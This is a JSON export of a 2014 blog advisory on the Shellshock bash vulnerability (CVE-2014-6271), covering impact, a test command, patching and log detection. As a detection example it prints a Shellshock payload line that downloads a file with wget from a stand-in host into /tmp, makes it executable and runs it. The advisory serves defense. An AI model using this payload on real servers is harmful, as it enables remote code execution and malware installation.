{"id":37,"date":"2014-09-28T16:35:00","date_gmt":"2014-09-28T16:35:00","guid":{"rendered":"http:\/\/www.asianux.org.vn\/index.php\/2014\/09\/28\/nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271\/"},"modified":"2014-09-28T16:35:00","modified_gmt":"2014-09-28T16:35:00","slug":"nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2014\/09\/28\/nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271\/","title":{"rendered":"What you need to know about the dangerous vulnerability in \u201cbash\u201d (CVE-2014-6271)"},"content":{"rendered":"<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">What is the \u201cbash\u201d security vulnerability (CVE-2014-6271)?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The \u201cbash\u201d security vulnerability, tracked as CVE-2014-6271, is an extremely dangerous vulnerability because of its wide impact and ease of exploitation. 
An attacker can easily execute system commands with the same privileges as the exploited service.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">In most of the exploitation cases seen on the Internet so far, attackers remotely target web servers hosting CGI scripts written in bash.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">At the time of writing, the vulnerability has already been used for fraudulent purposes: infecting vulnerable servers with malware, and in attacks by hackers. Researchers are continuously collecting new samples and signs of infection through this vulnerability; specific information about them will be published soon.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">It is important to understand that this vulnerability is not tied to any specific service, such as Apache or nginx. 
Instead, it lies in the bash shell interpreter and allows an attacker to append system commands to the environment variables that bash uses.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">How does the \u201cbash\u201d vulnerability work?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">To explain how the vulnerability works, we use an example similar to those seen in the advisories and in the published proof-of-concept exploit code. When you have a CGI script on a web server, the script automatically reads certain environment variables, for example your IP address, your web browser version and information about the local system.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">But imagine that you could not only pass this normal system information to the CGI script, but could also use it to run commands at a higher level on the system. 
This means that, without any credentials on the web server, simply by accessing the CGI script, these environment variables are read, and they can include an exploit string that causes the command you specify to be executed on the server.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">What makes the vulnerability unique and dangerous?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The vulnerability is dangerous because it is very easy to exploit, especially given the very large number of vulnerable targets. It affects not only web servers but any software that uses the bash interpreter and reads data that you supply.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Researchers are still trying to determine whether interpreters such as PHP, JSP, Python or Perl are affected. 
Depending on how the code is written, an interpreter sometimes uses bash to run certain functions; in that case, other interpreters may well be exposed to CVE-2014-6271 too.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The impact is very large because many embedded devices use CGI scripts, for example routers, home appliances and wireless access points. In many cases this vulnerability is very hard to patch.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">How widespread is the vulnerability?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">It is hard to say how widespread it is, but according to experts from Kaspersky, right after the vulnerability was disclosed many people developed exploits and spread related malware; both black-hat and white-hat hackers are scanning the Internet for servers vulnerable to it. Many exploits are being developed that target local files and network daemons. 
There has also been much discussion about OpenSSH and DHCP clients being vulnerable to this type of attack.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">How can I check whether my system\/website is affected?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The simplest way to check whether your system is vulnerable is to open a bash shell on the system and run the following command:<\/span><\/span><\/p>\n<blockquote>\n<pre><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"<\/span><\/span><\/pre>\n<\/blockquote>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">If the shell prints the string \u201cvulnerable\u201d, you should update your system. 
There are also other tools that test for this vulnerability by attempting to exploit your system.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Advice on patching the vulnerability?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The first thing you need to do is update your version of bash. The various Linux distributions are providing patches for this vulnerability; not all of them have been proven to be fully effective, but patching is the first step to take.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">If you use any IDS\/IPS, we recommend that you add\/load a signature for this vulnerability. Many public rules have been published. Also review your web server configuration. 
If there are any CGI scripts, disable them.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Is this a threat to online banking?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">This vulnerability is being exploited against servers hosted on the Internet. Even some workstations running Linux and OSX are affected, but an attacker would need to find a new attack vector in order to exploit it remotely against your computer.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The vulnerability does not target individuals but servers on the Internet. That also means, however, that if an e-commerce or banking website that you use is attacked, your personal information could in theory be compromised as well. 
At the time of writing, it is hard to say exactly which platforms are vulnerable and will become attack targets, but we recommend that you do not activate credit cards or share sensitive information over the coming days, until security researchers have found out more about the situation.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Is it possible to detect whether someone is exploiting this vulnerability?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">We recommend that you review your HTTP logs and check for anything suspicious. 
An example of a malicious pattern:<\/span><\/span><\/p>\n<pre><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">192.168.1.1 - - [25\/Sep\/2014:14:00:00 +0000] \"GET \/ HTTP\/1.0\" 400 349 \"() { :; }; wget -O \/tmp\/besh http:\/\/192.168.1.1\/filename; chmod 777 \/tmp\/besh; \/tmp\/besh;\"<\/span><\/span><\/pre>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">There are also some patches for bash that log every command line passed through the bash interpreter. This is a useful way to find out whether someone is exploiting your machine. It will not stop an attacker, but it will record their activity on the system.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">How serious is this threat?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">This vulnerability is truly dangerous, but not every system is vulnerable. 
Specific conditions must be met, for example a server running services that can be exploited. One of the biggest problems right now is that once patches are published, researchers will look for other ways to exploit bash, other conditions that allow bash to be exploited, and so on. The patches may help prevent malicious code execution but can do nothing about a file overwrite. So there will probably be a series of successive patches for bash.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Is this the new Heartbleed?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">It is easier for an attacker to exploit than Heartbleed. In the case of Heartbleed, an attacker could steal data from memory and look for interesting information in it. By contrast, the bash vulnerability can give an attacker control of the entire system. 
It therefore appears to be more dangerous than Heartbleed.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Could it be used in APT attacks in the future?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">It could be used in malware that automatically checks whether a device has the bug, spreads across systems and attacks in some way.<\/span><\/span><\/p>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">According to <span style=\"font-family: inherit;\">securitydaily.net<\/span> <\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>What is the \u201cbash\u201d security vulnerability (CVE-2014-6271)? 
The \u201cbash\u201d security vulnerability, tracked as CVE-2014-6271, is an extremely dangerous vulnerability because of its wide impact and ease of&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-37","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/37","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":0,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=37"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=37"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}